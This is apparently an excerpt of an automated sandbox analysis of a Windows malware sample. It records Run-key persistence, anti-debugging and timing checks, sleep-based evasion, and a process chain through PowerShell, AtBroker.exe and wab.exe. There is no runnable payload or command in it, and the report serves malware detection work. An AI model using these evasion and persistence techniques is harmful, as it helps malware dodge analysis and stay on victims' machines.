Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AA08CD push ecx; mov dword ptr [esp], ecx 15_2_04AA08D6
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AAA35C push cs; ret 15_2_02AAA35F
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AA40E6 pushfd ; ret 15_2_02AA40E7
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ACC0CF push eax; ret 15_2_02ACC0D1
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AB4050 push ebx; ret 15_2_02AB4100
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ABC6EC push ss; iretd 15_2_02ABC6EF
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AB8648 push edi; retf 15_2_02AB8670
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC2786 push edi; ret 15_2_02AC279B
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC2790 push edi; ret 15_2_02AC279B
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ABAAC3 push ds; iretd 15_2_02ABAAB8
Source: C:\Windows\SysWOW64\AtBroker.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S2U4LH Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run S2U4LH Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Program Files (x86)\Windows Mail\wab.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 rdtsc 12_2_23331763
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9911 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9917 Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Window / User API: threadDelayed 9852 Jump to behavior
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 0.6 %
Source: C:\Windows\SysWOW64\AtBroker.exe API coverage: 3.4 %
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5164 Thread sleep count: 9917 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384 Thread sleep count: 121 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384 Thread sleep time: -242000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384 Thread sleep count: 9852 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe TID: 4384 Thread sleep time: -19704000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exe TID: 1208 Thread sleep time: -30000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02ABD1C0 FindFirstFileW,FindNextFileW,FindClose, 15_2_02ABD1C0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows Jump to behavior
Source: powershell.exe, 00000006.00000002.20477959006.0000025A3ADF2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Checks if the current process is being debugged
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\AtBroker.exe Process queried: DebugPort Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23331763 rdtsc 12_2_23331763
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_0338DB10 LdrInitializeThunk, 10_2_0338DB10
Contains functionality to read the PEB
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE328 mov eax, dword ptr fs:[00000030h] 12_2_232EE328
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE328 mov eax, dword ptr fs:[00000030h] 12_2_232EE328
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EE328 mov eax, dword ptr fs:[00000030h] 12_2_232EE328
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C3336 mov eax, dword ptr fs:[00000030h] 12_2_233C3336
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23328322 mov eax, dword ptr fs:[00000030h] 12_2_23328322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23328322 mov eax, dword ptr fs:[00000030h] 12_2_23328322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23328322 mov eax, dword ptr fs:[00000030h] 12_2_23328322
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331332D mov eax, dword ptr fs:[00000030h] 12_2_2331332D
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330E310 mov eax, dword ptr fs:[00000030h] 12_2_2330E310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330E310 mov eax, dword ptr fs:[00000030h] 12_2_2330E310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330E310 mov eax, dword ptr fs:[00000030h] 12_2_2330E310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E9303 mov eax, dword ptr fs:[00000030h] 12_2_232E9303
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232E9303 mov eax, dword ptr fs:[00000030h] 12_2_232E9303
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2332631F mov eax, dword ptr fs:[00000030h] 12_2_2332631F
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AF30A mov eax, dword ptr fs:[00000030h] 12_2_233AF30A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337330C mov eax, dword ptr fs:[00000030h] 12_2_2337330C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2337330C mov eax, dword ptr fs:[00000030h] 12_2_2337330C
